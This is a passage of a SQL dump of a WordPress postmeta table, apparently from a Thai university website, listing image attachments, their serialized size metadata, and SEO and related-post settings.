(12350, 5479, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/04/56162078_789682304741293_6079661520432660480_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"56162078_789682304741293_6079661520432660480_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"56162078_789682304741293_6079661520432660480_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"56162078_789682304741293_6079661520432660480_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"56162078_789682304741293_6079661520432660480_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"56162078_789682304741293_6079661520432660480_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12351, 5477, '_thumbnail_id', '5479'),
(12355, 5477, '_hide_featured', NULL),
(12356, 5477, '_yoast_wpseo_content_score', '30'),
(12357, 5477, '_yoast_wpseo_primary_category', '31'),
(12358, 5477, '_wpas_done_all', '1'),
(12359, 5477, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575108317;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5671;}i:1;a:1:{s:2:\"id\";i:6324;}i:2;a:1:{s:2:\"id\";i:5385;}}}}'),
(12360, 5481, '_edit_lock', '1556256560:1'),
(12361, 5481, '_edit_last', '1'),
(12362, 5482, '_wp_attached_file', '2019/04/hr-26-04-2562.jpg'),
(12363, 5482, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3400;s:6:\"height\";i:4677;s:4:\"file\";s:25:\"2019/04/hr-26-04-2562.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hr-26-04-2562-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hr-26-04-2562-218x300.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hr-26-04-2562-768x1056.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1056;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"hr-26-04-2562-744x1024.jpg\";s:5:\"width\";i:744;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"hr-26-04-2562-218x300.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12367, 5481, '_hide_featured', NULL),
(12368, 5481, '_yoast_wpseo_content_score', '30'),
(12369, 5481, '_yoast_wpseo_primary_category', '39'),
(12370, 5481, '_wpas_done_all', '1'),
(12371, 5481, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575696730;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:6040;}i:1;a:1:{s:2:\"id\";i:5936;}}}}'),
(12374, 5486, '_wp_attached_file', '2018/05/30-4-2562-10-20-28.png'),
(12375, 5486, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:530;s:6:\"height\";i:183;s:4:\"file\";s:30:\"2018/05/30-4-2562-10-20-28.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-20-28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-20-28-300x104.png\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-20-28-400x138.png\";s:5:\"width\";i:400;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12376, 5487, '_wp_attached_file', '2018/05/30-4-2562-10-21-39.png'),
(12377, 5487, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:529;s:6:\"height\";i:183;s:4:\"file\";s:30:\"2018/05/30-4-2562-10-21-39.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-21-39-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-21-39-300x104.png\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-4-2562-10-21-39-400x138.png\";s:5:\"width\";i:400;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12378, 5488, '_wp_attached_file', '2018/05/201904300856.pdf'),
(12379, 5489, '_edit_lock', '1556594607:3'),
(12380, 5489, '_edit_last', '3'),
(12381, 5489, '_hide_featured', NULL),
(12382, 5489, '_yoast_wpseo_content_score', '60'),
(12433, 5520, '_wp_attached_file', '2019/05/FB_IMG_1556699723196.jpg'),
(12434, 5520, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2019/05/FB_IMG_1556699723196.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699723196-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699723196-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699723196-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12435, 5521, '_wp_attached_file', '2019/05/FB_IMG_1556699723196-1.jpg'),
(12436, 5521, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:34:\"2019/05/FB_IMG_1556699723196-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12437, 5522, '_wp_attached_file', '2019/05/FB_IMG_1556699723196-2.jpg'),
(12438, 5522, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:34:\"2019/05/FB_IMG_1556699723196-2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-2-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12441, 5524, '_wp_attached_file', '2019/05/FB_IMG_1556699723196-3.jpg'),
(12442, 5524, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:34:\"2019/05/FB_IMG_1556699723196-3.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"FB_IMG_1556699723196-3-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12443, 5525, '_edit_lock', '1556701420:13'),
(12444, 5525, '_edit_last', '13'),
(12445, 5526, '_wp_attached_file', '2019/05/FB_IMG_1556699685961.jpg'),
(12446, 5526, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2019/05/FB_IMG_1556699685961.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699685961-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699685961-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699685961-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12447, 5527, '_wp_attached_file', '2019/05/FB_IMG_1556699714320.jpg'),
(12448, 5527, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2019/05/FB_IMG_1556699714320.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699714320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699714320-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699714320-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12449, 5528, '_wp_attached_file', '2019/05/FB_IMG_1556699691411.jpg'),
(12450, 5528, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:720;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2019/05/FB_IMG_1556699691411.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699691411-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699691411-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1556699691411-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12451, 5525, '_thumbnail_id', '5526'),
(12455, 5525, '_hide_featured', NULL),
(12456, 5525, '_yoast_wpseo_content_score', '90'),
(12457, 5525, '_yoast_wpseo_primary_category', '31'),
(12458, 5525, '_wpas_done_all', '1'),
(12459, 5525, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575270172;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6318;}i:1;a:1:{s:2:\"id\";i:3961;}i:2;a:1:{s:2:\"id\";i:5137;}}}}'),
(12460, 5530, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_1.png'),
(12461, 5530, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12462, 5531, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_2.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(12463, 5531, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_2-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_2-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_2-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_2-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12464, 5532, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_3.png'),
(12465, 5532, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_3-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_3-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_3-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_3-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12466, 5533, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_4.png'),
(12467, 5533, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_4-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_4-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_4-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_4-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12468, 5534, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_5.png'),
(12469, 5534, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:62:\"2019/04/ค่าลงทะเบียน-1-2562_Page_5.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_5-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_5-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:63:\"ค่าลงทะเบียน-1-2562_Page_5-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:62:\"ค่าลงทะเบียน-1-2562_Page_5-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12470, 5535, '_wp_attached_file', '2019/04/ค่าลงทะเบียน-1-2562_Page_6.png'),
